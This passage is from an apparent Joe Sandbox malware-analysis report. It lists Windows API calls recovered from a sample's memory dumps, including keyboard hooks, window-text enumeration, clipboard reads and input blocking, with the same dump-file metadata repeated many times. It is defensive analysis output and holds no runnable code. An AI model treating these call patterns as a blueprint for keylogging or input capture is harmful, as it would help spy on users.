    • DeleteObject.GDI32(00000000), ref: 0046A036
    • DestroyCursor.USER32(00000000), ref: 0046A050
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetCurrentProcess.KERNEL32(?,?,0043485C,?,?,Col,Focused,?,00000000), ref: 00472DEE
    • IsWow64Process.KERNEL32(00000000,?,0043485C,?,?,Col,Focused,?,00000000), ref: 00472DF5
    • IsWow64Process.KERNEL32(\HC,?,?,0043485C,?,?,Col,Focused,?,00000000), ref: 00472E0E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetModuleHandleA.KERNEL32(user32,BlockInput,00427E02,004987E9), ref: 0042D09A
    • GetProcAddress.KERNEL32(00000000), ref: 0042D0A1
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 0049551A
    • GetProcAddress.KERNEL32(00000000), ref: 00495521
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetModuleHandleA.KERNEL32(user32,SendInput), ref: 0049544A
    • GetProcAddress.KERNEL32(00000000), ref: 00495451
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetForegroundWindow.USER32 ref: 004758A8
    • IsWindowVisible.USER32(00000000), ref: 004758C4
    • GetForegroundWindow.USER32 ref: 004758F7
    • IsWindowVisible.USER32(00000000), ref: 00475960
      • Part of subcall function 00476AD0: GetWindowTextA.USER32(?,?,00007FFF), ref: 00476B06
      • Part of subcall function 00476AD0: GetWindowThreadProcessId.USER32(?,?), ref: 00476B2B
      • Part of subcall function 00476AD0: GetWindowThreadProcessId.USER32(?,?), ref: 00476B3E
      • Part of subcall function 00476AD0: GetClassNameA.USER32(?,?,00000101), ref: 00476B81
      • Part of subcall function 00476690: __Stoull.NTSTC_LIBCMT ref: 00476741
      • Part of subcall function 00476690: IsWindow.USER32(00000000), ref: 004767D4
      • Part of subcall function 00476690: __Stoull.NTSTC_LIBCMT ref: 004767FF
      • Part of subcall function 00476690: __Stoull.NTSTC_LIBCMT ref: 00476858
      • Part of subcall function 00476690: _strncpy.LIBCMT ref: 0047688A
      • Part of subcall function 00476690: __Stoull.NTSTC_LIBCMT ref: 004768F9
      • Part of subcall function 00476690: __Stoull.NTSTC_LIBCMT ref: 0047691B
      • Part of subcall function 00476690: _strncpy.LIBCMT ref: 0047694B
      • Part of subcall function 00476690: _strncpy.LIBCMT ref: 00476A10
      • Part of subcall function 00476690: _strncpy.LIBCMT ref: 00476A75
      • Part of subcall function 00476B90: __Stoull.NTSTC_LIBCMT ref: 00476C32
      • Part of subcall function 00476B90: __Stoull.NTSTC_LIBCMT ref: 00476DB9
      • Part of subcall function 00476B90: EnumChildWindows.USER32(00000000,00475CF0,?), ref: 00476E31
      • Part of subcall function 00475C20: IsWindow.USER32(?), ref: 00475C2E
      • Part of subcall function 00475C20: IsWindowVisible.USER32(?), ref: 00475C48
      • Part of subcall function 00475C20: GetWindowLongA.USER32(?,000000F0), ref: 00475C5B
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • CallNextHookEx.USER32(00000000,?,?,?), ref: 00404819
    • GetForegroundWindow.USER32 ref: 004048E0
    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004048ED
    • GetKeyboardLayout.USER32(00000000), ref: 004048F8
      • Part of subcall function 00411970: VkKeyScanExA.USER32(00000020,00000000), ref: 004119F6
      • Part of subcall function 00404B30: GetTickCount.KERNEL32 ref: 00404BB6
      • Part of subcall function 00404B30: GetForegroundWindow.USER32 ref: 00404BE7
      • Part of subcall function 00404B30: PostMessageA.USER32(000601DA,00000418,0000000C,00000000), ref: 00404C0C
      • Part of subcall function 00404B30: GetKeyState.USER32(00000090), ref: 00404CC8
      • Part of subcall function 00404B30: FindWindowA.USER32(#32771,00000000), ref: 00404E3E
      • Part of subcall function 00404B30: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00404E4B
      • Part of subcall function 00404B30: GetCurrentThreadId.KERNEL32 ref: 00404E53
      • Part of subcall function 00404B30: FindWindowA.USER32(#32768,00000000), ref: 0040503C
      • Part of subcall function 00404B30: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00405049
      • Part of subcall function 00412130: MapVirtualKeyA.USER32(0040B185,00000000), ref: 0041221B
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • SendMessageTimeoutA.USER32(?,000000B0,?,?,00000002,000007D0,?), ref: 0045065E
    • SendMessageTimeoutA.USER32(?,000000C9,?,00000000,00000002,000007D0,?), ref: 0045067F
    • SendMessageTimeoutA.USER32(?,000000C9,?,00000000,00000002,000007D0,00000000), ref: 004506A8
    • SendMessageTimeoutA.USER32(?,000000C9,?,00000000,00000002,000007D0,00000000), ref: 004506D5
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00441960: GetForegroundWindow.USER32 ref: 00441987
      • Part of subcall function 00441960: IsWindowVisible.USER32(00000000), ref: 004419A2
      • Part of subcall function 00476090: _strncpy.LIBCMT ref: 004760FE
      • Part of subcall function 00476090: EnumChildWindows.USER32(?,004761B0,?), ref: 0047613C
      • Part of subcall function 00476090: EnumChildWindows.USER32(?,004761B0,?), ref: 00476166
      • Part of subcall function 00476090: GetWindowLongA.USER32(?,000000F0), ref: 0047617C
    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043423E
    • AttachThreadInput.USER32(00000E10,00000000,00000000), ref: 004342BD
      • Part of subcall function 00476550: GetModuleHandleA.KERNEL32(user32,IsHungAppWindow,?,004755DA), ref: 00476576
      • Part of subcall function 00476550: GetProcAddress.KERNEL32(00000000,?,004755DA), ref: 0047657D
      • Part of subcall function 00476550: SendMessageTimeoutA.USER32(00000000,00000000,00000000,00000000,00000002,00001388,00000000), ref: 004765AF
    • AttachThreadInput.USER32(00000E10,00000000,00000001), ref: 00434266
    • SetFocus.USER32(?), ref: 00434276
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 0046E3E1
    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0046E3F6
    • WritePrivateProfileSectionA.KERNEL32(?,?,?), ref: 0046E442
    • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0046E457
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetWindowTextA.USER32(?,?,00007FFF), ref: 00476B06
    • GetWindowThreadProcessId.USER32(?,?), ref: 00476B2B
    • GetWindowThreadProcessId.USER32(?,?), ref: 00476B3E
      • Part of subcall function 0044E300: OpenProcess.KERNEL32(00000410,00000000,?,7619EDFA,?,?,00000000), ref: 0044E31F
      • Part of subcall function 0044E300: OpenProcess.KERNEL32(00001000,00000000,?), ref: 0044E32E
      • Part of subcall function 0044E300: GetModuleBaseNameA.PSAPI(00000000,00000000,?,00000104), ref: 0044E354
      • Part of subcall function 0044E300: GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 0044E35C
      • Part of subcall function 0044E300: GetModuleHandleA.KERNEL32(psapi,GetProcessImageFileNameA), ref: 0044E37E
      • Part of subcall function 0044E300: GetProcAddress.KERNEL32(00000000), ref: 0044E385
      • Part of subcall function 0044E300: CloseHandle.KERNEL32(00000000), ref: 0044E3F6
      • Part of subcall function 0044E300: QueryDosDeviceA.KERNEL32(?,?,00000104), ref: 0044E424
      • Part of subcall function 0044E300: __Stoull.NTSTC_LIBCMT ref: 0044E43B
      • Part of subcall function 0044E300: CloseHandle.KERNEL32(00000000), ref: 0044E45C
      • Part of subcall function 0044E300: CloseHandle.KERNEL32(00000000), ref: 0044E495
    • GetClassNameA.USER32(?,?,00000101), ref: 00476B81
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetMenu.USER32(?), ref: 0045C73C
    • IsWindowVisible.USER32(?), ref: 0045C750
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 0045C772
    • RedrawWindow.USER32(?,00000000,00000000,00000501), ref: 0045C789
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GlobalUnWire.KERNEL32(00000000), ref: 0040446C
    • CloseClipboard.USER32 ref: 00404471
    • GlobalUnWire.KERNEL32(00000000), ref: 00404485
    • GlobalFree.KERNEL32(00000000), ref: 00404495
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471FA0: CharLowerA.USER32(?), ref: 00471FAF
      • Part of subcall function 00471FA0: CharLowerA.USER32 ref: 00471FB8
      • Part of subcall function 00471FA0: CharLowerA.USER32(?), ref: 00471FCC
      • Part of subcall function 00471FF0: CharLowerA.USER32(?), ref: 00472008
      • Part of subcall function 00471FF0: CharUpperA.USER32 ref: 00472023
      • Part of subcall function 00471FF0: CharLowerA.USER32(00000000), ref: 0047204C
      • Part of subcall function 00471FF0: CharUpperA.USER32(?), ref: 00472061
      • Part of subcall function 00471FF0: CharLowerA.USER32 ref: 0047209A
      • Part of subcall function 00471FF0: CharLowerA.USER32(00000000), ref: 004720A7
      • Part of subcall function 00471FF0: CharLowerA.USER32(00000000), ref: 004720C1
      • Part of subcall function 00471FF0: CharLowerA.USER32(?), ref: 004720CF
      • Part of subcall function 00471FF0: CharLowerA.USER32(?), ref: 004720EB
      • Part of subcall function 00471FF0: CharLowerA.USER32(00000000), ref: 004720F8
    • CharLowerA.USER32(?), ref: 0040720C
    • CharLowerA.USER32 ref: 00407216
    • IsCharAlphaNumericA.USER32(?), ref: 00407244
      • Part of subcall function 00409680: SendMessageTimeoutA.USER32(000601DA,00000419,?,?,00000003,000003E8,?), ref: 0040970D
    • IsCharLowerA.USER32 ref: 00407305
    • IsCharUpperA.USER32(00000000), ref: 00407313
    • IsCharUpperA.USER32 ref: 00407329
    • IsCharLowerA.USER32(00000000), ref: 00407384
    • ToAsciiEx.USER32(?,?,?,?,00000000,?), ref: 004074C0
    • lstrcmpi.KERNEL32(00000000), ref: 00407690
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • _strlen.LIBCMT ref: 0048D833
      • Part of subcall function 0048AC43: Sleep.KERNEL32(00000000,004719BE,004011C4), ref: 0048AC6B
    • _strlen.LIBCMT ref: 0048D864
      • Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
      • Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0
      • Part of subcall function 00489164: GetCurrentProcess.KERNEL32(C0000417,004719BE,004011C4), ref: 0048917A
      • Part of subcall function 00489164: TerminateProcess.KERNEL32(00000000), ref: 00489181
      • Part of subcall function 0048D5CD: x_ismbbtype_l.LIBCMT ref: 0048D5DB
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • _strncpy.LIBCMT ref: 0040B633
      • Part of subcall function 0040BA80: GetKeyboardLayout.USER32(00000000), ref: 0040BB04
      • Part of subcall function 0040BA80: __Stoull.NTSTC_LIBCMT ref: 0040BCB7
      • Part of subcall function 0040B730: _strncpy.LIBCMT ref: 0040B92A
      • Part of subcall function 0040B730: _strncpy.LIBCMT ref: 0040B9A4
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • WideCharToMultiByte.KERNEL32(00000000), ref: 00475290
    • WideCharToMultiByte.KERNEL32(00000000,00000400,0049E27C,0044570B,004ABB26,00000000,?,00000000,00000000,00000001,00000000), ref: 00475303
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0042F580: __Stoull.NTSTC_LIBCMT ref: 0042F5F5
    • _strncpy.LIBCMT ref: 0043D2B9
    • SetVolumeLabelA.KERNEL32(?,?), ref: 0043D303
      • Part of subcall function 0043CE10: _strncpy.LIBCMT ref: 0043CE47
      • Part of subcall function 0043CE10: GetModuleHandleA.KERNEL32(kernel32,GetDiskFreeSpaceExA), ref: 0043CEA3
      • Part of subcall function 0043CE10: GetProcAddress.KERNEL32(00000000), ref: 0043CEAA
      • Part of subcall function 0043CE10: GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 0043CF23
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • _strncpy.LIBCMT ref: 0043D481
    • GetVolumeInformationA.KERNEL32(?,?,000000FF,?,?,?,?,000000FF), ref: 0043D4DF
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00484F3E: RtlEnterCriticalSection.NTDLL(?), ref: 00484F76
      • Part of subcall function 00489FDA: __isleadbyte_l.LIBCMT ref: 0048A363
      • Part of subcall function 00489FDA: __cftof.LIBCMT ref: 0048A503
      • Part of subcall function 00489FDA: _strlen.LIBCMT ref: 0048A595
      • Part of subcall function 00489FDA: __aulldvrm.INT64 ref: 0048A8CC
      • Part of subcall function 00489FDA: __cftof.LIBCMT ref: 0048AA78
    • __ftbuf.LIBCMT ref: 00486DE8
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 004145F0: __Stoull.NTSTC_LIBCMT ref: 00414670
      • Part of subcall function 00414740: GetCPInfo.KERNEL32(?,?), ref: 00414756
    • __itow.LIBCMT ref: 00470A4E
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetMenuItemInfoA.USER32 ref: 0046965E
    • SetMenuItemInfoA.USER32(?,?,00000000,?), ref: 00469689
      • Part of subcall function 0045C710: GetMenu.USER32(?), ref: 0045C73C
      • Part of subcall function 0045C710: IsWindowVisible.USER32(?), ref: 0045C750
      • Part of subcall function 0045C710: SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 0045C772
      • Part of subcall function 0045C710: RedrawWindow.USER32(?,00000000,00000000,00000501), ref: 0045C789
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • _UnwindNestedFrames.LIBCMT ref: 00494449
      • Part of subcall function 004936CB: RtlUnwind.KERNEL32(004936F6,004936F6,?,00000000), ref: 004936F1
      • Part of subcall function 00493E0F: __getptd.LIBCMT ref: 00493E36
      • Part of subcall function 00493E0F: __CallSettingFrame@12.LIBVCRUNTIME ref: 00493E82
      • Part of subcall function 00494072: __CreateFrameInfo.LIBCMT ref: 0049409A
      • Part of subcall function 00494072: __getptd.LIBCMT ref: 004940A4
      • Part of subcall function 00494072: __getptd.LIBCMT ref: 004940B2
      • Part of subcall function 00494072: __getptd.LIBCMT ref: 004940C0
      • Part of subcall function 00494072: __getptd.LIBCMT ref: 004940CB
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,004A1768,00000008,004889FD,00000000,00000000,?,0048A041,00000100,004719BE,004011C4), ref: 00488906
      • Part of subcall function 00489727: __amsg_exit.LIBCMT ref: 00489749
      • Part of subcall function 00489727: RtlEnterCriticalSection.NTDLL(004011C4), ref: 00489751
    • InterlockedIncrement.KERNEL32(08498B00), ref: 00488947
      • Part of subcall function 00488539: InterlockedIncrement.KERNEL32(004011C4), ref: 0048854B
      • Part of subcall function 00488539: InterlockedIncrement.KERNEL32(753BFD70), ref: 00488558
      • Part of subcall function 00488539: InterlockedIncrement.KERNEL32(664815FF), ref: 00488565
      • Part of subcall function 00488539: InterlockedIncrement.KERNEL32(57187210), ref: 00488572
      • Part of subcall function 00488539: InterlockedIncrement.KERNEL32(0674FF85), ref: 0048857F
      • Part of subcall function 00488539: InterlockedIncrement.KERNEL32(0674FF85), ref: 0048859B
      • Part of subcall function 00488539: InterlockedIncrement.KERNEL32(004A6920), ref: 004885AB
      • Part of subcall function 00488539: InterlockedIncrement.KERNEL32(813C3902), ref: 004885C1
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
